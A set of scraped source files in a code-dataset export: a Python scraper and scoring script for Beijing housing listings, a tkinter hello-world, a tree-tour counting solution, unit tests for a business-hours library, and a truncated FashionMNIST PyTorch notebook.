Safari/537.36\",\n# \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36\",\n# \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)\",\n# \"Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15\",\n]\nzj1='500'\nzj2='1200'\nmj1='80'\nmj2='200'\nj3='l3'\nj4='l4'\nj5='l5'\nlocation = {\"andingmen\",\"anzhen1\",\"aolinpikegongyuan11\",\"dongzhimen\",\n \"gongti\",\"guozhan1\",\"hepingli\",\"huixinxijie\",\"madian1\",\"nanshatan1\",\n \"sanlitun\",\"sanyuanqiao\",\"shaoyaoju\",\"taiyanggong\",\"xibahe\",\"yayuncun\",\n \"yayuncunxiaoying\",\"wangjing\"}\ndistrict_list={\"dongcheng\",\"xicheng\",\"chaoyang\",\"haidian\",\"fengtai\"}\n\ndistrict_list={\"haidian\"}\n\ndiqu_rate= 20\n\nchaoxiang_rate=10\nhuxing_rate=8\nzhuangxiu_rate=7\n\nlouceng_rate=8\nzonggao_rate=4\nniandai_rate=6\nlouxing_rate=3.5\n\nVR_rate=1\nditie_rate=6\nkanfang_rate=1\n\ntaxfree_rate=5\n\n'''\nl3l4l5 三四五居室\nie2有电梯 ie1没电梯\nf朝向东南西北 f5南北朝向\nlc 楼层 lc5顶层\nurl = 'bp'+zj1+'ep'+mj2+'ba'+mj1+'ea'+mj2+'l3l4l5hu0sf1lc2lc3lc5f5ie2'\n\n'''\n\nfirst_url = 'https://bj.5i5j.com/ershoufang/xichengqu/b500e1200f1f3f5h300l50r2r3r4r5r9n'\n\n\n\nmylist = []\ndatabase =[]\ndate1=''\ndate2=''\n\ndef get_html(url):\n\n headers = {'User-Agent': '', 'referer': 'link'}\n headers['User-Agent'] = random.choice(user_agent_list)\n response = requests.get(url, headers=headers)\n response.encoding = 'utf-8'\n html = response.text\n soup = BeautifulSoup(html, \"lxml\")\n try:\n title = soup.title.string\n print('没变:',title[0:40])\n\n\n\n except:\n print('改变啦')\n script=html.head.script.text\n url = script[script.find(\"'\", 1):-1].strip()\n print(soup)\n get_html(url)\n\n return soup\n\ndef house_info(dis,i):\n global count\n page_url = str(i+1)\n detail_url = first_url+page_url\n print(detail_url)\n\n soup = get_html(detail_url)\n\n url_list = soup.find('div', class_=\"list-con-box\").find_all('li')\n\n for item in url_list:\n score=0\n url = item.find('div',class_='listImg').a.attrs['href']\n id = url[12:-5]\n url = 'https://bj.5i5j.com'+url\n\n id = \"Aj\"+id\n title = item.find('h3',class_='listTit').a.text.strip()\n # print('关注:','https://bj.5i5j.com'+url)\n # print('id:',id)\n # print('标题:',title)\n info1 = item.find('i',class_='i_01').find_parent('p').text.strip().replace(' ','')\n huxing = info1[0:info1.find('·', 1)].strip()\n mianji = info1[info1.find('·', 1)+1:info1.find('平米', 1)].strip()\n\n chaoxiang = info1[info1.find('平米')+3:info1.rfind('·',0,-8)].strip()\n louceng = info1[info1.rfind('·',0,-8)+1:info1.rfind('/')].strip()\n\n zonggao = info1[info1.rfind(\"/\", 1)+1:info1.rfind(\"·\", 1)].strip()\n zhuangxiu = info1[info1.rfind('·', 1)+1:].strip()\n\n # print('户型:',huxing)\n # print('面积:',mianji)\n # print('朝向:',chaoxiang)\n #\n # print('楼层:',louceng)\n # print('总高:',zonggao)\n # print('装修:',zhuangxiu)\n\n info2 = item.find('i',class_='i_02').find_parent('p').text.strip()\n diqu=info2[0:info2.find(' ',1)].strip()\n xiaoqu = info2[info2.find(' ',1):info2.rfind('·',1)].strip()\n ditie=info2[info2.rfind('·',1)+2:].strip()\n # print('地区:',diqu)\n # print('小区:',xiaoqu)\n # print('地铁:',ditie)\n\n info3 = item.find('i',class_='i_03').find_parent('p').text.strip()\n guanzhu=info3[0:info3.find(' ',1)].strip()\n daikan=info3[info3.find('带看',1)+2:info3.rfind('次',1)].strip()\n fabu=info3[info3.rfind('·',1)+2:-2].strip()\n # print('关注:',guanzhu)\n # print('带看:',daikan)\n # print('发布:',fabu)\n\n\n zongjia = item.find('p',class_='redC').find('strong').text.strip()\n danjiatt = item.find('div',class_='jia').text.replace(' ','').replace('\\n','').strip()\n danjia = danjiatt[danjiatt.rfind('单价', 1)+2:-4]\n\n\n\n dianti=''\n\n\n niandai=''\n louxing=''\n\n\n\n\n VR = ''\n kanfang = ''\n taxfree=''\n # try:\n # taxfree=item.find_element_by_class_name('taxfree').text.strip()\n # taxfree = '5年'\n # except:\n # try:\n # taxfree=item.find_element_by_class_name('five').text.strip()\n # taxfree='2年'\n # except:\n # taxfree='不满'\n\n\n\n if diqu== '和平里': diqu_score = 14 * diqu_rate\n elif diqu == '和平里': diqu_score = 10 * diqu_rate\n elif diqu == '惠新西街': diqu_score = 9 * diqu_rate\n elif diqu == '芍药居': diqu_score = 8 * diqu_rate\n elif diqu == '亚运村': diqu_score = 8 * diqu_rate\n elif diqu == '国展': diqu_score = 8 * diqu_rate\n elif diqu == '亚运村小营': diqu_score = 8 * diqu_rate\n elif diqu == '西坝河': diqu_score = 8 * diqu_rate\n elif diqu == 'CBD': diqu_score = 7 * diqu_rate\n elif diqu == '太阳宫': diqu_score = 8 * diqu_rate\n elif diqu == '朝阳门外': diqu_score = 6 * diqu_rate\n elif diqu == '健翔桥': diqu_score = 7 * diqu_rate\n elif diqu == '三元桥': diqu_score = 7 * diqu_rate\n elif diqu == '望京': diqu_score = 6 * diqu_rate\n elif diqu == '奥林匹克公园': diqu_score = 6 * diqu_rate\n elif diqu == '燕莎': diqu_score = 6 * diqu_rate\n elif diqu == '北苑': diqu_score = 5 * diqu_rate\n elif diqu == '大望路': diqu_score = 5 * diqu_rate\n elif diqu == '南沙滩': diqu_score = 5 * diqu_rate\n elif diqu == '农展馆': diqu_score = 5 * diqu_rate\n elif diqu == '四惠': diqu_score = 3 * diqu_rate\n elif diqu == '双井': diqu_score = 3 * diqu_rate\n elif diqu == '朝阳公园': diqu_score = 3 * diqu_rate\n elif diqu == '华威桥': diqu_score = 3 * diqu_rate\n elif diqu == '劲松': diqu_score = 3 * diqu_rate\n elif diqu == '北工大': diqu_score = 3 * diqu_rate\n elif diqu == '立水桥': diqu_score = 3 * diqu_rate\n elif diqu == '潘家园': diqu_score = 3 * diqu_rate\n elif diqu == '酒仙桥': diqu_score = 3 * diqu_rate\n elif diqu == '红庙': diqu_score = 3 * diqu_rate\n elif diqu == '十里河': diqu_score = 3 * diqu_rate\n elif diqu == '大山子': diqu_score = 2 * diqu_rate\n elif diqu == '十八里店': diqu_score = 2 * diqu_rate\n elif diqu == '双桥': diqu_score = 1 * diqu_rate\n elif diqu == '朝青': diqu_score = 1 * diqu_rate\n elif diqu == '东坝': diqu_score = 1 * diqu_rate\n elif diqu == '常营': diqu_score = 1 * diqu_rate\n elif diqu == '欢乐谷': diqu_score = 1 * diqu_rate\n elif diqu == '豆各庄': diqu_score = 1 * diqu_rate\n elif diqu == '石佛营': diqu_score = 1 * diqu_rate\n elif diqu == '百子湾': diqu_score = 1 * diqu_rate\n elif diqu == '甜水园': diqu_score = 2 * diqu_rate\n elif diqu == '十里堡': diqu_score = 1 * diqu_rate\n elif diqu == '成寿寺': diqu_score = 1 * diqu_rate\n elif diqu == '垡头': diqu_score = 1 * diqu_rate\n elif diqu == '定福庄': diqu_score = 1 * diqu_rate\n elif diqu == '高碑店': diqu_score = 1 * diqu_rate\n elif diqu == '甘露园': diqu_score = 1 * diqu_rate\n elif diqu == '朝阳其它': diqu_score = 1 * diqu_rate\n else : diqu_score = 1 * diqu_rate\n\n if zhuangxiu == '5室3厅':\n huxing_score = 14 * huxing_rate\n elif chaoxiang == '5室2厅':\n huxing_score = 13 * huxing_rate\n elif chaoxiang == '5室1厅':\n huxing_score = 12 * huxing_rate\n elif chaoxiang == '4室3厅':\n huxing_score = 13 * huxing_rate\n elif chaoxiang == '4室2厅':\n huxing_score = 12 * huxing_rate\n elif chaoxiang == '4室1厅':\n huxing_score = 11 * huxing_rate\n elif chaoxiang == '3室3厅':\n huxing_score = 12 * huxing_rate\n elif chaoxiang == '3室2厅':\n huxing_score = 11 * huxing_rate\n elif chaoxiang == '3室1厅':\n huxing_score = 10 * huxing_rate\n elif chaoxiang == '3室0厅':\n huxing_score = 7 * huxing_rate\n elif chaoxiang == '2室2厅':\n huxing_score = 8 * huxing_rate\n elif chaoxiang == '2室1厅':\n huxing_score = 7 * huxing_rate\n elif chaoxiang == '2室0厅':\n huxing_score = 5 * huxing_rate\n else:\n huxing_score = 2 * huxing_rate\n\n\n\n\n\n\n if chaoxiang.replace(' ','')=='南北': chaoxiang_score=10*chaoxiang_rate\n elif chaoxiang.replace(' ','')=='东南北': chaoxiang_score=7*chaoxiang_rate\n else: chaoxiang_score=4*huxing_rate\n\n if zhuangxiu == '精装':\n zhuangxiu_score= 10*zhuangxiu_rate\n elif chaoxiang == '其他':\n zhuangxiu_score = 6*zhuangxiu_rate\n elif chaoxiang == '简装':\n zhuangxiu_score = 6*zhuangxiu_rate\n else:\n zhuangxiu_score = 2*zhuangxiu_rate\n\n fangwu_score = chaoxiang_score+zhuangxiu_score+huxing_score\n\n try:\n if int(zonggao[1:-1]) >= 20:\n zonggao_score = 10*zonggao_rate\n elif int(zonggao[1:-1]) >= 15:\n zonggao_score = 8.5*zonggao_rate\n elif int(zonggao[1:-1]) >= 10:\n zonggao_score = 7*zonggao_rate\n else:\n zonggao_score = 5*zonggao_rate\n except: zonggao_score = 5*zonggao_rate\n\n if louceng == '高楼层':\n louceng_score = 10*louceng_rate\n elif louceng == '顶层':\n louceng_score = 9*louceng_rate\n elif louceng == '中楼层':\n louceng_score = 7*louceng_rate\n zonggao_score = 0.5*zonggao_score\n elif louceng == '低楼层':\n louceng_score = 4.5*louceng_rate\n zonggao_score = 0\n else:\n louceng_score = 2*louceng_rate\n zonggao_score = 0\n\n if louxing == '板楼':\n louxing_score = 10*louxing_rate\n elif louxing == '板塔结合':\n louxing_score = 8.5*louxing_rate\n else :\n louxing_score = 6.5*louxing_rate\n\n\n # 楼龄\n try:\n if int(niandai) >= 2010:\n niandai_score = 10*niandai_rate\n elif int(niandai) >= 2000:\n niandai_score = 8*niandai_rate\n elif int(niandai) >= 1990:\n niandai_score = 5*niandai_rate\n else:\n niandai_score = 3*niandai_rate\n except: niandai_score = 3*niandai_rate\n\n lou_score = louxing_score + louceng_score + niandai_score + zonggao_score\n\n # 近地铁,vr,随时看房\n if ditie=='近地铁':\n ditie_score = 10*ditie_rate\n else:\n ditie_score=0\n if VR == 'VR房源':\n VR_score = 10*VR_rate\n else:\n VR_score=0\n if kanfang == '随时看房':\n kanfang_score = 10*kanfang_rate\n else:\n kanfang_score=0\n\n # 满五唯一\n if taxfree=='5年':\n taxfree_score = 10*taxfree_rate\n elif taxfree == '2年':\n taxfree_score = 6*taxfree_rate\n else:\n taxfree_score = 2*taxfree_rate\n\n fujia_score = diqu_score+ditie_score+VR_score+kanfang_score+taxfree_score\n # score =float('%.2f' %((fujia_score+fangwu_score+lou_score)/6))\n # rate_score = float('%.2f' % (score/int(danjia)*80000))\n score = 0\n rate_score =0\n print('=================' + dis + '===' + str(count) + '=================')\n print(' 链接 :' + url)\n print(' ID :' + str(id))\n print(' 简介 :' + title)\n print(' 地区 :' + diqu)\n # print(' 评分 :' , score, end='')\n # print(' 性价比 :' , rate_score, end='')\n print(' 总价 :' + zongjia)\n print(' 单价 :' + danjia)\n print(' 详情 :')\n print(' 小区 :' + xiaoqu)\n print(' 户型 :' + huxing)\n print(' 面积 :' + mianji)\n print(' 朝向 :' + chaoxiang)\n print(' 装修 :' + zhuangxiu)\n print(' 电梯 :' + dianti)\n print(' 楼层 :' + louceng)\n print(' 总高 :' + zonggao)\n #\n # print(' 年代 :' + niandai)\n # print(' 楼型 :' + louxing)\n print(' 地铁 :' + ditie)\n # print(' VR :' + VR)\n # print(' 购房 :' + taxfree)\n # print(' 看房 :' + kanfang)\n print(' 关注 :' + guanzhu)\n print(' 带看 :' + daikan)\n\n print(' 发布 :', fabu)\n\n\n\n\n\n\n mylist.append([id,score,rate_score,url, title, dis,diqu, xiaoqu, zongjia, danjia, huxing, mianji, chaoxiang, zhuangxiu,\n dianti, louceng,zonggao, niandai, louxing, ditie, VR, taxfree, fabu, guanzhu,daikan])\n\n count=count+1\n\n save_to_excel(dis,mylist)\n time.sleep(10)\n\n\ndef save_to_excel(dis,mylist):\n\n headers = (\n 'ID','总分','性价比','url', '标题', '城区','地区', '小区', '总价', '单价','户型', '面积', '朝向', '装修',\n '电梯', '楼层','总楼层', '年代', '楼型', '地铁', 'VR', '满五', '发布', '关注量','带看量')\n #print(mylist)\n\n mylist = tablib.Dataset(*mylist, headers=headers)\n\n with open('D:\\zhaofang_AJ_'+dis+'.xlsx', 'wb') as f:\n f.write(mylist.export('xlsx'))\n\ndef save_to_database1():\n db = pymysql.connect(host='localhost', user='root', password='777748', port=3306, db='zhaofang')\n cursor = db.cursor()\n try:\n\n for i in range(3):\n sql = \"INSERT INTO zhaofang \" \\\n \"(id,score,rate_score,url, title, \" \\\n \"dis,diqu, xiaoqu, zongjia, danjia, \" \\\n \"huxing, mianji, chaoxiang, zhuangxiu,dianti, \" \\\n \"louceng,zonggao, niandai, louxing, \" \\\n \"ditie, VR, taxfree, kanfang, guanzhu,daikan) VALUES \" \\\n \"(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s) ON DUPLICATE KEY UPDATE \" \\\n \"vote=\" + \"'\" +str(mylist[i][4]) + \"',\"\\\n \"Meta_rate=\" + \"'\" + str(mylist[i][5]) + \"',\"\\\n \"Mtime_rate=\" + \"'\" + str(mylist[i][6] )+ \"',\"\\\n \"douban_rate=\" + \"'\" + str(mylist[i][7]) + \"',\"\\\n \"my_rate=\" + \"'\" +str( mylist[i][8]) + \"',\"\\\n \"budget=\" + \"'\" + str(mylist[i][13]) + \"',\"\\\n \"gross=\" + \"'\" + str(mylist[i][14]) + \"'\"\\\n\n\n\n cursor.execute(sql, (mylist[i][0],mylist[i][1],mylist[i][2],mylist[i][3],mylist[i][4],mylist[i][5],\n mylist[i][6],mylist[i][7],mylist[i][8],mylist[i][9],mylist[i][10],mylist[i][11],\n mylist[i][12], mylist[i][13],mylist[i][14],mylist[i][15],mylist[i][16],mylist[i][17],mylist[i][18]))\n\n print(sql)\n print('Successful')\n db.commit()\n except Exception as e:\n print('错误')\n print(e)\n\n db.rollback()\n db.close()\n\n\n\ndef total_pages(url):\n soup = get_html(url)\n print('total_pages',soup)\n house_number = int(soup.find('div', class_=\"total-box\").text[3:-3].strip())\n page_number= int(get_url(house_number))\n print('----共计'+str(house_number)+'套房屋----')\n print('----共计'+str(page_number)+'页----')\n return page_number\n\n\n\ndef get_url(next_page):\n if next_page<=30:\n return 1\n else :\n return int(next_page)/30+1\n\ndef main():\n for dis in district_list:\n district_first_url = first_url + '1'\n print(\"区域:\"+dis)\n total_page=total_pages(district_first_url)\n for i in range(total_page):\n\n house_info(dis,i)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"com/myfish/zhaofang/aijia.py","file_name":"aijia.py","file_ext":"py","file_size_in_byte":16674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"485260732","text":"from tkinter import *\nimport tkinter.messagebox as messagebox\n\nclass Application(Frame):\n\n\n def __init__(self, master=None):\n Frame.__init__(self, master)\n self.pack()\n self.create_widgets()\n\n def create_widgets(self):\n self.helloLabel = Label(self, text='Hello, world!')\n self.helloLabel.pack()\n self.quitButton = Button(self, text='Quit', command=self.quit)\n self.quitButton.pack()\n\n\n# application = Application()\n# # 设置窗口标题\n# application.master.title('Hello world')\n# application.mainloop()\n\n\nclass InputApplication(Frame):\n\n def __init__(self, master=None):\n Frame.__init__(self, master)\n self.pack()\n self.create_widgets()\n\n def create_widgets(self):\n self.nameInput = Entry(self)\n self.nameInput.pack()\n self.quitButton = Button(self, text='Hello', command=self.hello)\n self.quitButton.pack()\n\n def hello(self):\n name = self.nameInput.get() or 'world'\n messagebox.showinfo('Message', 'Hello %s' % name)\n\napplication = InputApplication()\n# 设置窗口标题\napplication.master.title('Hello world')\napplication.mainloop()\n","sub_path":"src/ui/use_tkinter.py","file_name":"use_tkinter.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"464232065","text":"import math\ndef tours(adj, N):\n facts = [0]*N\n z=0\n for i in range(len(adj)):\n vertList = adj[i]\n z_count = 0\n nz_count = 0\n for neighbor in vertList:\n if len(adj[neighbor]) == 1:\n facts[i] += 1\n z_count += 1\n z+= 1\n else:\n nz_count += 1\n if nz_count > 2:\n return 0\n sum = 1\n for num in facts:\n sum = (sum * math.factorial(num)) % 1000000007\n if z == N-1:\n return sum\n return (2*sum)% 1000000007\n \nT = int(input())\nfor i in range(T):\n N = int(input())\n adj = [[] for i in range(N)]\n for x in range(1, N):\n road = list(map(int,input().split()))\n adj[road[0]].append(road[1])\n adj[road[1]].append(road[0])\n print(tours(adj, N))\n","sub_path":"Algorithm/bytelandian_tour.py","file_name":"bytelandian_tour.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"613346919","text":"from datetime import datetime, date, timedelta\nimport unittest\n\nfrom businesstime import BusinessTime, USFederalHolidays\n\n\nclass BusinessTimeTest(unittest.TestCase):\n\n def setUp(self):\n \"\"\"\n Tests mostly based around January 2014, where two holidays, New Years Day\n and MLK day, fall on the 1st and 20th, respectively.\n\n January 2014\n Su Mo Tu We Th Fr Sa\n 1 2 3 4\n 5 6 7 8 9 10 11\n 12 13 14 15 16 17 18\n 19 20 21 22 23 24 25\n 26 27 28 29 30 31\n \"\"\"\n self.bt = BusinessTime(holidays=USFederalHolidays())\n\n def test_iterdays(self):\n start = datetime(2014, 1, 16)\n end = datetime(2014, 1, 22)\n self.assertEqual(\n tuple(self.bt.iterdays(start, end)),\n (\n datetime(2014, 1, 16),\n datetime(2014, 1, 17),\n datetime(2014, 1, 18),\n datetime(2014, 1, 19),\n datetime(2014, 1, 20),\n datetime(2014, 1, 21)\n )\n )\n\n def test_iterdays_same_day(self):\n start = datetime(2014, 1, 16, 12, 15)\n end = datetime(2014, 1, 16, 12, 16)\n self.assertEqual(\n tuple(self.bt.iterdays(start, end)),\n (\n datetime(2014, 1, 16),\n )\n )\n\n def test_iterdays_clears_time(self):\n start = datetime(2014, 1, 16, 12, 12, 11)\n end = datetime(2014, 1, 18, 15)\n self.assertEqual(\n tuple(self.bt.iterdays(start, end)),\n (\n datetime(2014, 1, 16),\n datetime(2014, 1, 17)\n )\n )\n\n def test_iterweekdays(self):\n start = datetime(2014, 1, 16)\n end = datetime(2014, 1, 22)\n self.assertEqual(\n tuple(self.bt.iterweekdays(start, end)),\n (\n datetime(2014, 1, 16),\n datetime(2014, 1, 17),\n datetime(2014, 1, 20),\n datetime(2014, 1, 21)\n )\n )\n\n def test_iterbusinessdays(self):\n start = datetime(2014, 1, 16)\n end = datetime(2014, 1, 22)\n self.assertEqual(\n tuple(self.bt.iterbusinessdays(start, end)),\n (\n datetime(2014, 1, 16),\n datetime(2014, 1, 17),\n datetime(2014, 1, 21)\n )\n )\n\n def test_iterbusinessdays_conforms_to_business_hours(self):\n start = datetime(2014, 1, 16, 17, 1)\n end = datetime(2014, 1, 23, 2)\n self.assertEqual(\n tuple(self.bt.iterbusinessdays(start, end)),\n (\n datetime(2014, 1, 17),\n datetime(2014, 1, 21),\n datetime(2014, 1, 22)\n )\n )\n\n def test_isduringbusinessday(self):\n self.assertTrue(self.bt.isduringbusinesshours(datetime(2014, 1, 15, 12)))\n self.assertFalse(self.bt.isduringbusinesshours(datetime(2014, 1, 15)))\n self.assertFalse(self.bt.isduringbusinesshours(datetime(2014, 1, 18, 11)))\n self.assertFalse(self.bt.isduringbusinesshours(datetime(2014, 1, 20, 11, 46, 43)))\n\n def test_holidays_specified_as_list(self):\n bd = BusinessTime(holidays=[date(2014, 1, 1)])\n self.assertTrue(bd.isholiday(date(2014, 1, 1)))\n self.assertFalse(bd.isholiday(date(2014, 1, 2)))\n\n def test_businesstimedelta_after_during(self):\n start = datetime(2014, 1, 16, 18, 30)\n end = datetime(2014, 1, 22, 10, 0)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(days=2, hours=1)\n )\n\n def test_businesstimedelta_1_minute_after_during(self):\n \"\"\"https://github.com/seatgeek/businesstime/issues/7\"\"\"\n start = datetime(2015, 2, 23, 17, 0)\n end = datetime(2015, 2, 24, 14, 20)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(hours=5, minutes=20)\n )\n start = datetime(2015, 2, 23, 17, 1)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(hours=5, minutes=20)\n )\n\n def test_businesstimedelta_nonbusiness_after(self):\n start = datetime(2014, 1, 12, 12)\n end = datetime(2014, 1, 17, 19, 30)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(days=4, hours=8)\n )\n\n def test_businesstimedelta_before_after(self):\n start = datetime(2014, 1, 13, 4)\n end = datetime(2014, 1, 17, 19, 30)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(days=4, hours=8)\n )\n\n def test_businesstimedelta_during_after(self):\n start = datetime(2014, 1, 30, 12, 15)\n end = datetime(2014, 1, 31, 19, 30)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(days=1, hours=4, minutes=45)\n )\n\n def test_businesstimedelta_during_before(self):\n start = datetime(2014, 8, 4, 11)\n end = datetime(2014, 8, 6, 5)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(days=1, hours=6)\n )\n\n def test_businesstimedelta_before_before(self):\n start = datetime(2014, 8, 4, 1)\n end = datetime(2014, 8, 4, 5)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(days=0)\n )\n\n def test_businesstimedelta_after_after(self):\n start = datetime(2014, 8, 4, 22)\n end = datetime(2014, 8, 4, 23)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(days=0)\n )\n\n def test_businesstimedelta_during_nonbusiness(self):\n start = datetime(2014, 1, 10, 16, 15)\n end = datetime(2014, 1, 12, 12, 30)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(minutes=45)\n )\n\n def test_businesstimedelta_during_nonbusiness2(self):\n start = datetime(2014, 1, 9, 16, 15)\n end = datetime(2014, 1, 12, 12, 30)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(days=1, minutes=45)\n )\n\n def test_businesstimedelta_after_nonbusiness(self):\n start = datetime(2014, 1, 10, 17, 15)\n end = datetime(2014, 1, 12, 12, 30)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta()\n )\n\n def test_businesstimedelta_during_during(self):\n start = datetime(2014, 1, 2, 9, 12)\n end = datetime(2014, 1, 3, 9, 10)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(hours=7, minutes=58)\n )\n\n def test_businesstimedelta_during_during2(self):\n start = datetime(2014, 1, 2, 9, 10)\n end = datetime(2014, 1, 3, 9, 12)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(days=1, minutes=2)\n )\n\n def test_businesstimedelta_during_during3(self):\n start = datetime(2014, 1, 2, 9, 10)\n end = datetime(2014, 1, 2, 9, 12)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(minutes=2)\n )\n\n def test_businesstimedelta_nonbusiness_nonbusiness(self):\n start = datetime(2014, 1, 4, 9, 10)\n end = datetime(2014, 1, 4, 9, 12)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta()\n )\n\n def test_businesstimedelta_exactly_one_day(self):\n start = datetime(2014, 1, 7, 10)\n end = datetime(2014, 1, 8, 10)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(days=1)\n )\n\n def test_businesstimedelta_exactly_one_day2(self):\n \"\"\"\n Test for https://github.com/seatgeek/businesstime/issues/3\n \"\"\"\n start = datetime(2014, 1, 7, 9)\n end = datetime(2014, 1, 8, 9)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(days=1)\n )\n\n\nclass USFederalHolidaysTest(unittest.TestCase):\n\n def test_2013(self):\n holidays_gen = USFederalHolidays()\n self.assertEqual(\n list(holidays_gen(date(2013, 1, 1), end=date(2013, 12, 31))),\n [\n date(2013, 1, 1),\n date(2013, 1, 21),\n date(2013, 2, 18),\n date(2013, 5, 27),\n date(2013, 7, 4),\n date(2013, 9, 2),\n date(2013, 10, 14),\n date(2013, 11, 11),\n date(2013, 11, 28),\n date(2013, 12, 25)\n ]\n )\n\n def test_2014(self):\n holidays_gen = USFederalHolidays()\n self.assertEqual(\n list(holidays_gen(date(2014, 1, 1), end=date(2014, 12, 31))),\n [\n date(2014, 1, 1),\n date(2014, 1, 20),\n date(2014, 2, 17),\n date(2014, 5, 26),\n date(2014, 7, 4),\n date(2014, 9, 1),\n date(2014, 10, 13),\n date(2014, 11, 11),\n date(2014, 11, 27),\n date(2014, 12, 25)\n ]\n )\n\n def test_2015(self):\n holidays_gen = USFederalHolidays()\n self.assertEqual(\n list(holidays_gen(date(2015, 1, 1), end=date(2015, 12, 31))),\n [\n date(2015, 1, 1),\n date(2015, 1, 19),\n date(2015, 2, 16),\n date(2015, 5, 25),\n date(2015, 7, 3),\n date(2015, 7, 4),\n date(2015, 9, 7),\n date(2015, 10, 12),\n date(2015, 11, 11),\n date(2015, 11, 26),\n date(2015, 12, 25)\n ]\n )\n\n def test_2016(self):\n holidays_gen = USFederalHolidays()\n self.assertEqual(\n list(holidays_gen(date(2016, 1, 1), end=date(2016, 12, 31))),\n [\n date(2016, 1, 1),\n date(2016, 1, 18),\n date(2016, 2, 15),\n date(2016, 5, 30),\n date(2016, 7, 4),\n date(2016, 9, 5),\n date(2016, 10, 10),\n date(2016, 11, 11),\n date(2016, 11, 24),\n date(2016, 12, 25),\n date(2016, 12, 26)\n ]\n )\n\n def test_2017(self):\n holidays_gen = USFederalHolidays()\n self.assertEqual(\n list(holidays_gen(date(2017, 1, 1), end=date(2017, 12, 31))),\n [\n date(2017, 1, 1),\n date(2017, 1, 2),\n date(2017, 1, 16),\n date(2017, 2, 20),\n date(2017, 5, 29),\n date(2017, 7, 4),\n date(2017, 9, 4),\n date(2017, 10, 9),\n date(2017, 11, 10),\n date(2017, 11, 11),\n date(2017, 11, 23),\n date(2017, 12, 25)\n ]\n )\n","sub_path":"businesstime/test/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"22659840","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Training Deep Neural Networks with PyTorch\n\n# In[1]:\n\n\nimport torch\nimport torchvision\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchvision.datasets import FashionMNIST\nfrom torchvision.transforms import ToTensor\nfrom torchvision.utils import make_grid\nfrom torch.utils.data.dataloader import DataLoader\nfrom torch.utils.data import random_split\nget_ipython().run_line_magic('matplotlib', 'inline')\n\nmatplotlib.rcParams['figure.facecolor'] = '#ffffff'\n\n\n# We can download the data and create a PyTorch dataset using the `MNIST` class from `torchvision.datasets`. \n\n# In[2]:\n\n\n#Preparing the Data\ndataset = FashionMNIST(root='data/', download=True, transform=ToTensor())\ntest_dataset = FashionMNIST(root='data/', train=False, transform=ToTensor())\n\n\n# In[3]:\n\n\nimage, label = dataset[0]\nprint('image.shape:', image.shape)\nplt.imshow(image.permute(1, 2, 0), cmap='gray')\nprint('Label:', label)\nprint('Label:', dataset.classes[label])\n\n\n# In[4]:\n\n\nimage, label = dataset[5]\nprint('image.shape:', image.shape)\nplt.imshow(image.permute(1, 2, 0), cmap='gray')\nprint('Label:', label)\nprint('Label:', dataset.classes[label])\n\n\n# In[5]:\n\n\n#Using `random_split` helper function, set aside 10000 images as validation set. \nval_size = 10000\ntrain_size = len(dataset) - val_size\ntrain_ds, val_ds = random_split(dataset, [train_size, val_size])\nlen(train_ds), len(val_ds)\n\n\n# We can now create PyTorch data loaders for training and validation.\n\n# In[6]:\n\n\nbatch_size=128\n\n\n# In[7]:\n\n\ntrain_loader = DataLoader(train_ds, batch_size, shuffle=True, num_workers=4, pin_memory=True)\nval_loader = DataLoader(val_ds, batch_size*2, num_workers=4, pin_memory=True)\ntest_loader = DataLoader(test_dataset, batch_size*2, num_workers=4, pin_memory=True)\n\n\n# In[8]:\n\n\n#visualize a batch of data\nfor images, _ in train_loader:\n print('images.shape:', images.shape)\n plt.figure(figsize=(16,8))\n plt.axis('off')\n plt.imshow(make_grid(images, nrow=16).permute((1, 2, 0)))\n break #1 batch only - break\n\n\n# ## Model\n# \n# Visual representation of the model with only 1 hidden layer (but I will use 3 hidden layers in the code).\n# \n# \n# \n# \n# Let's define the model by extending the `nn.Module` class from PyTorch.\n\n# Then, use the Rectified Linear Unit (ReLU) function as the activation function for the outputs. It has the formula `relu(x) = max(0,x)` i.e. it simply replaces negative values in a given tensor with the value 0. ReLU is a non-linear function, as seen here visually:\n# \n# \n# \n# We can use the `F.relu` method to apply ReLU to the elements of a tensor.\n\n# In[29]:\n\n\nclass MnistModel(nn.Module):\n 